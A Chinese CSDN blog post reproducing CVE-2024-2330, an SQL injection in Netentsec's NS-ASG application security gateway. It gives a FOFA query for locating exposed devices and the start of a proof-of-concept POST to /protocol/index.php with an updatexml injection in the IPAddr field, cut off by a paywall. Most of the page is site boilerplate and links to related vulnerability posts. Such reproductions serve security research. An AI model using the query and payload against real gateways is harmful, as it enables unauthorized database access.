【漏洞复现】网康NS-ASG应用安全网关 index.php SQL注入漏洞(CVE-2024-2330)

最新推荐文章于 2024-05-11 14:44:11 发布
最新推荐文章于 2024-05-11 14:44:11 发布
阅读量494 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/136633597
版权

0x01 产品简介

网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品,集成了SSL和 IPSecQ,旨在保障业务访问的安全性,适配所有移动终端,提供多种链路均衡和选择技术,支持多种认证方式灵活组合,以及内置短信认证、LDAP令牌、USB KEY等多达13种认证方式。

0x02 漏洞概述

Netentsec NS-ASG Application Security Gateway 6.3中发现了一个漏洞,被分类为危急级别。这影响了文件/protocol/index.php的一个未知部分。对参数IPAddr的操作导致了SQL注入。攻击者可以远程发起攻击。

0x03 测绘语句

fofa:title="网康-NS-ASG-应用安全网关"

0x04 漏洞复现

POST /protocol/index.php HTTP/1.1

Host: 127.0.0.1

Content-Type: application/x-www-form-urlencoded



jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,md5(1),0x7e),1))='\",\"MacAddr\":\"\",\"DestIP\":\&
了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
订阅专栏
蓝网科技临床浏览系统 deleteStudy SQL注入漏洞复现(CVE-2024-4257)
0xSec
04-29 882
蓝网科技临床浏览系统 deleteStudy接口处SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
漏洞复现网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)
weixin_52204925的博客
03-12 1064
由于网康科技 NS-ASG 应用安全网关 /protocol/firewall/uploadmacbind.php文件没有对用户输入的参数进行严格的校验和过滤,导致输入的语句直接插入到数据库执行造成SQL注入,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。
漏洞复现网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2022)
weixin_52204925的博客
03-07 812
网康科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。
网康科技 NS-ASG 应用安全网关 SQL注入漏洞复现(CVE-2024-2330)
0xSec
03-12 535
​由于网康科技 NS-ASG 应用安全网关/protocol/firewall/uploadmacbind.php文件没有对用户输入的参数进行严格的校验和过滤,如下导致输入的语句直接插入到数据库执行造成SQL注入,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。
网康 NS-ASG安全网关存在远程命令执行漏洞 复现
薛定谔嘚喵博客
10-09 360
网康应用安全网关系统 存在远程命令执行漏洞 ,攻击者通过漏洞可以执行任意命令,导致服务器失陷。
网康NS-ASG应用安全网关listloginfo.php sql注入CVE-2024-3041(含批量验证poc)
最新发布
weixin_43567873的博客
05-11 41
网康NS-ASG应用安全网关listloginfo.php sql注入CVE-2024-3041(含批量验证poc)
网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2022)
wan___she__pi的博客
03-26 630
网康科技NS-ASG 应用安全网关是一种网络设备,旨在保护企业的网络应用免受各种网络威胁和攻击。它结合了防火墙、入侵检测和防御系统(IDS/IPS)、反病毒、反垃圾邮件、VPN(虚拟专用网络)等功能,提供全面的应用安全保护。网康科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,造成数据库信息泄露。
网康应用安全网关(NS-ASG)-list_ipAddressPolicy-SQL注入漏洞CVE-2024-2022)复现
selecthch的博客
03-12 517
攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。网康应用安全网关(NS-ASG) list_ipAddressPolicy 接口存在SQL注入漏洞网康应用安全网关(NS-ASG)-list_ipAddressPolicy-SQL注入漏洞。FOFA:app="网康-NS-ASG-应用安全网关"网康应用安全网关(NS-ASG)漏洞类别: SQL注入漏洞
网康科技 NS-ASG 应用安全网关 SQL注入漏洞复现(CVE-2024-3458、CVE-2024-3457、CVE-2024-3456、CVE-2024-3455)
0xSec
04-13 377
网康科技 NS-ASG 应用安全网关 add_ikev2.php、config_ISCGroupNoCache.php、add_postlogin.php、config_Anticrack.php等接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
TPLink-NGFW-GWLB-ASG-v3.1_CJ.yml
07-12
TPLink-NGFW-GWLB-ASG-v3.1_CJ.yml
02-AWS-CLI-EC2-ELB-ASG-CloudWatch操作指南-v1.0.pdf
03-17
AWS-CLI-EC2-ELB-ASG-CloudWatch操作指南 核心指导文档
terraform-aws-asg:Terraform AWS Auto Scaling堆栈
02-04
先决条件预先配置的AWS VPC要求Terraform 0.8.0或更高版本AWS提供商组模块组模块将提供安全组,启动配置和自动扩展组资源。 ELB和简单组配置均受支持。输入变量资源标签stack_item_fullname此堆栈项目的长格式描述性...
terraform-aws-asg-dns-handler:Terraform模块,用于根据AWS Auto Scaling组中实例上的模式动态设置主机名
02-04
要求 0.12+ 2.0+用法创建一个ASG并设置asg:hostname_pattern标签,例如: asg-test-#instanceid.asg-handler-vpc.testing@Z3QP9GZSRL8IVA可以像这样在Terraform中插值: tag { key = " asg:hostname_pattern
endurox-go:Go应用程序服务器(ASG
03-14
GO应用程序服务器(ASG) 版本:2.0.0-使用对象模式API。 ASG是Golang的应用程序服务器,它可以处理Golang中的分布式事务。 可以在不中断服务的情况下重新加载应用程序组件。 基本上,系统是面向服务的,服务器...
nginx-asg-sync:NGINX Plus与Cloud Autoscaling的集成
02-10
NGINX Plus与Cloud Autoscaling的集成-nginx-asg-sync -asg-sync允许发现云提供商的扩展组的实例(虚拟机)。 支持以下提供程序: AWS Azure 当实例数量改变时,nginx-asg-sync将新实例添加到NGINX Plus配置中,并...
ASG-of-One:AWS Auto Scale一组模板
04-09
一号ASG 一个简单的自动缩放一组的CloudFormation模板。 该模板允许使用引导URL,这是sh的简单管道。 通过提供存储在github / gitlab原始url中的bash脚本(可公共访问),您可以在One的ASG中引导ec2实例。
asg-elb:boltopsproasg-elb的公共文档
02-22
如果您只需要将具有传统EC2实例的负载均衡器部署为高可用性应用程序,则此蓝图很有用。 模板利用了灵活的AWS :: AutoScaling :: AutoScalingGroup MixedInstancesPolicy。 这使您可以使用竞价型,按需或混合实例...
FANUC机器人PRIO-063故障报警原因分析及解决办法.docx
05-16
FANUC机器人PRIO-063故障报警原因分析及解决办法
汇编代码_sub_3E99E3: .asmfunc .asg 0, var_0 .asg -2, var_2 .asg -5, var_5 .asg -6, var_6 .asg -7, var_7 .asg -8, var_8 .asg -9, var_9 .asg -0Ah, var_A .asg -0Bh, var_B .asg -0Ch, var_C .asg -0Dh, var_D .asg -0Eh, var_E .asg -0Fh, var_F .asg -10h, var_10 .asg -11h, var_11 .asg -12h, var_12 addb SP,#20转成C语言应该如何定义变量
07-08
这里假设在汇编代码中使用的 `.asg` 指令是用于定义变量并为其分配内存空间的指令。根据 `.asg` 指令后面的指定值,我们可以确定每个变量的数据类型和相应的大小。请注意,这里将所有的变量都定义为 `char` 类型,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值